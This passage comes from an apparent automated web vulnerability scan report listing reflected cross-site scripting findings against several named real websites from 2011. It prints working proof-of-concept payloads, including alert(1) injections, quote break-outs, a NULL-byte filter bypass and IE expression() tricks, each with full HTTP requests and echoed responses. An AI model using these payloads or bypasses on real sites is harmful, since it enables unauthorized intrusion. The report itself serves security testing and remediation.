Date: Thu, 20 Jan 2011 00:37:47 GMT
X-Varnish: 1025262006
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=date;date=;user=armchairmango;s=posts;e5887"><script>alert(1)</script>9370de61105=1;page=2">
...[SNIP]...

3.8. http://armchairmango.blip.tv/posts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://armchairmango.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a409'%3balert(1)//6d1e7a506f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a409';alert(1)//6d1e7a506f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?7a409'%3balert(1)//6d1e7a506f9=1 HTTP/1.1
Host: armchairmango.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Thu, 03-Feb-2011 00:37:56 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Thu, 03-Feb-2011 00:37:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52289
Date: Thu, 20 Jan 2011 00:37:49 GMT
X-Varnish: 1025262141
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://armchairmango.blip.tv/rss?sort=date;page=1;date=;7a409';alert(1)//6d1e7a506f9=1;user=armchairmango;s=posts';
           window.generic_feed_uri = 'sort=date;page=1;date=;7a409\';alert(1)//6d1e7a506f9=1;user=armchairmango;s=posts';
           
       
   </script>
...[SNIP]...

3.9. http://backend.userland.com/creativeCommonsRssModule [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://backend.userland.com
Path:   /creativeCommonsRssModule

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 897c2<script>alert(1)</script>66f32101386 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /creativeCommonsRssModule897c2<script>alert(1)</script>66f32101386 HTTP/1.1
Host: backend.userland.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 389
Content-Type: text/html
Date: Thu, 20 Jan 2011 00:37:07 GMT
Server: UserLand Frontier/9.5-WinNT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head><title>404 Not Found</title>
   </head>
   <body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">
       <
...[SNIP]...
</h2>
       The requested URL http://backend.userland.com/creativeCommonsRssModule897c2<script>alert(1)</script>66f32101386 was not found on this server.
       </body>
...[SNIP]...

3.10. http://blip.tv/posts/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /posts/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6a3a1<script>alert(1)</script>b9e99fd9f5f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts/?bookmarked_by=hotepisodes&skin=json&callback=FeaturedContent.populateFeatured6a3a1<script>alert(1)</script>b9e99fd9f5f&version=2%20&pagelen=4&page=1 HTTP/1.1
Host: blip.tv
Proxy-Connection: keep-alive
Referer: http://blip.tv/file/4639878
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __utmb=3555683.1.10.1295482483; __qca=P0-535727044-1295482483262

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 20 Jan 2011 00:31:47 +0000
Cache-control: max-age=180, proxy-revalidate
Vary: Cookie
X-otter-skin: json
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Thu, 03-Feb-2011 00:28:47 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 13571
Date: Thu, 20 Jan 2011 00:28:47 GMT
X-Varnish: 1324470526
Age: 0
Via: 1.1 varnish
Connection: keep-alive

FeaturedContent.populateFeatured6a3a1<script>alert(1)</script>b9e99fd9f5f([{
   "title":"Food Swap",
   "adminTitle":"Food Swap",
   "description":"Canned elk anyone? The summer\'s harvest is long over. Hours spent near a hot stove canning those tomatoes, peaches, or pickling be
...[SNIP]...

3.11. http://brxserv.btrll.com/crossdomain.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /crossdomain.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7aa1<script>alert(1)</script>2de7005331c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /crossdomain.xmle7aa1<script>alert(1)</script>2de7005331c HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:28:16 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:28:16 GMT; path=/; domain=.btrll.com
Content-Length: 206
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
Found unexpected '.' character in position 1 of path: /crossdomain.xmle7aa1<script>alert(1)</script>2de7005331c</body>
</
...[SNIP]...

3.12. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9bac"><script>alert(1)</script>ae91c46f784 was submitted in the REST URL parameter 1. This input was echoed as f9bac"><script>alert(1)</script>ae91c46f784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00f9bac"><script>alert(1)</script>ae91c46f784 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:40:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899127717691648%3A164; expires=Fri, 21-Jan-2011 00:40:25 GMT; path=/; domain=digg.com
Set-Cookie: d=b5834023a2db5ed0524ef48ee5264f3757af35a33a6d22458193ead46af99172; expires=Tue, 19-Jan-2021 10:48:05 GMT; path=/; domain=.digg.com
X-Digg-Time: D=254963 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15581

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00f9bac"><script>alert(1)</script>ae91c46f784.rss">
...[SNIP]...

3.13. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b90fa'%3balert(1)//c600b73d47 was submitted in the redir parameter. This input was echoed as b90fa';alert(1)//c600b73d47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.martini&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524%3Fb90fa'%3balert(1)//c600b73d47 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTn>qsXgZ2Ox#Kzwi3jhndu4.q@P`fym?BM6A(6j?L^F^pT+$t)o#'1yqNmTr+csDU[n.KmyD0IP?EJtun(LG%y$qg]mw!5$=%sod-+0?6As/^Y`/=Uxi

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 21-Jan-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb448794=5_[r^kI/7ZrO@Pn0nf8MJg5TL?enc=usDlsWbk4j8Ox07TwgDhPwAAAAAAAAhADsdO08IA4T-6wOWxZuTiPxP-XtM-6VNaBWHfHSmrEEI5gjdNAAAAAGI7AwA3AQAAZAAAAAIAAAA4UAIAPV0AAAEAAABVU0QAVVNEANgCWgCqAQAALAkBAgUCAAUAAAAAKiFTbQAAAAA.&tt_code=cm.martini&udj=uf%28%27a%27%2C+27%2C+1295483449%29%3Buf%28%27r%27%2C+151608%2C+1295483449%29%3Bppv%2882%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2884%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2811%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2882%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2884%2C+%276508802342523960851%27%2C+1295483449%2C+1305851449%2C+2132%2C+23869%29%3Bppv%2887%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3Bppv%28619%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3Bppv%28620%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3Bppv%28621%2C+%276508802342523960851%27%2C+1295483449%2C+1295569849%2C+2132%2C+23869%29%3B&cnd=!LR4gugjUEBC4oAkYwI8BIL26ASgAMVSzvcxm5OI_QhMIABAAGAAgASj-__________8BQg0IUhC-40sYpQggAygGQg0IVBDVlhsYgQQgAygGSANQAFiqA2AAaGQ.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Fri, 21-Jan-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmUMbNTPg(12lh-=?(PCR0ep_TvkXX49-qCQB:hlS?9mnBpbb)jKuoIgTwzHPZ2[uGVGi2$WVP]vE7ilpu2(MPy%SF(w77BERA(EO4I(3<csJ3xssMeZG!9VNR'OLN2; path=/; expires=Wed, 20-Apr-2011 00:30:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 20 Jan 2011 00:30:49 GMT
Content-Length: 429

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.martini/;net=cm;u=,cm-82053649_1295482372,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l;;cmw=owl;sz=728x90;net=cm;ord1=707118;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.weath_l;ord=3271752524?b90fa';alert(1)//c600b73d47">
...[SNIP]...

3.14. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4b7"style%3d"x%3aexpression(alert(1))"7e6ef821d0e was submitted in the REST URL parameter 1. This input was echoed as 5a4b7"style="x:expression(alert(1))"7e6ef821d0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products5a4b7"style%3d"x%3aexpression(alert(1))"7e6ef821d0e/plugin/autodl/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Jan 2011 00:41:25 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products5a4b7"style="x:expression(alert(1))"7e6ef821d0e/plugin/autodl/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

3.15. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ec44"style%3d"x%3aexpression(alert(1))"e3f53b57d76 was submitted in the REST URL parameter 2. This input was echoed as 5ec44"style="x:expression(alert(1))"e3f53b57d76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin5ec44"style%3d"x%3aexpression(alert(1))"e3f53b57d76/autodl/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Jan 2011 00:40:41 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin5ec44"style="x:expression(alert(1))"e3f53b57d76/autodl/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

3.16. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://java.sun.com
Path:   /products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5475e"style%3d"x%3aexpression(alert(1))"7c7f389030d was submitted in the REST URL parameter 3. This input was echoed as 5475e"style="x:expression(alert(1))"7c7f389030d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin/5475e"style%3d"x%3aexpression(alert(1))"7c7f389030d/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 20 Jan 2011 00:41:33 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>
<!-- BEGIN METADATA -->
<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin/5475e"style="x:expression(alert(1))"7c7f389030d/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

3.17. http://k.collective-media.net/cmadj/cm.martini/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.martini/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c28e'-alert(1)-'ec11dfd28f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.martini5c28e'-alert(1)-'ec11dfd28f8/;sz=728x90;net=cm;ord=3271752524;ord1=707118;cmpgurl=http%253A//www.sailinganarchy.com/index_page1.php? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 20 Jan 2011 00:30:32 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:31 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Fri, 21-Jan-2011 00:30:31 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Thu, 27-Jan-2011 00:30:31 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Thu, 20-Jan-2011 08:30:31 GMT
Content-Length: 8065

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-95806145_1295483431","http://ib.adnxs.com/ptj?member=311&inv_code=cm.martini5c28e'-alert(1)-'ec11dfd28f8&size=728x90&referrer=http%3A%2F%2Fwww.sailinganarchy.com%2Findex_page1.php&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini5c28e%27-alert%281%29-%27ec11dfd28f8%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-958061
...[SNIP]...

3.18. http://k.collective-media.net/cmadj/cm.martini/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.martini/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1943c'-alert(1)-'aa62200fb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.martini/;sz=1943c'-alert(1)-'aa62200fb HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; mmpg=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Thu, 20 Jan 2011 00:43:08 GMT
Content-Length: 7417
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-10628852_1295484188","http://ib.adnxs.com/ptj?member=311&inv_code=cm.martini&size=1943c'-alert(1)-'aa62200fb&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.martini%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10628852_1295484188%2C11d765b6a10b1b3%2Cnone%2Ccm.cm_aa_gn1-cm.sportsreg-cm.weath_l-cm.sports_m%3B%3Bcmw%3D
...[SNIP]...

3.19. http://www.americascupmedia.com/index.php [co parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bf0a'><script>alert(1)</script>4694b2364e4 was submitted in the co parameter. This input was echoed as 9bf0a\'><script>alert(1)</script>4694b2364e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?lang=en&fn=folio&FolioID=83&co=19bf0a'><script>alert(1)</script>4694b2364e4 HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:45:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=586c6741fdb46ae80b334070c12e8931; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 156744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media -
...[SNIP]...
<input type='hidden' name='co' id='co' value='19bf0a\'><script>alert(1)</script>4694b2364e4'>
...[SNIP]...

3.20. http://www.americascupmedia.com/index.php [co parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.americascupmedia.com
Path:   /index.php

Issue detail

The value of the co request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea1fa"><script>alert(1)</script>8102d3b9511 was submitted in the co parameter. This input was echoed as ea1fa\"><script>alert(1)</script>8102d3b9511 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?lang=en&fn=folio&FolioID=83&co=1ea1fa"><script>alert(1)</script>8102d3b9511 HTTP/1.1
Host: www.americascupmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 00:45:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=1a85d98a42aae84687229b91132260fb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 156744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Americas Cup Media -
...[SNIP]...
<a href="AC-45--launched---,83,1ea1fa\"><script>alert(1)</script>8102d3b9511,en,fp.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('imgpetite','','./taiga/americascup/4pictos_vign_petite_on.gif',1)">
...[SNIP]...

3.21. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barcelonaworldrace.org
Path:   /en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072

Issue detail

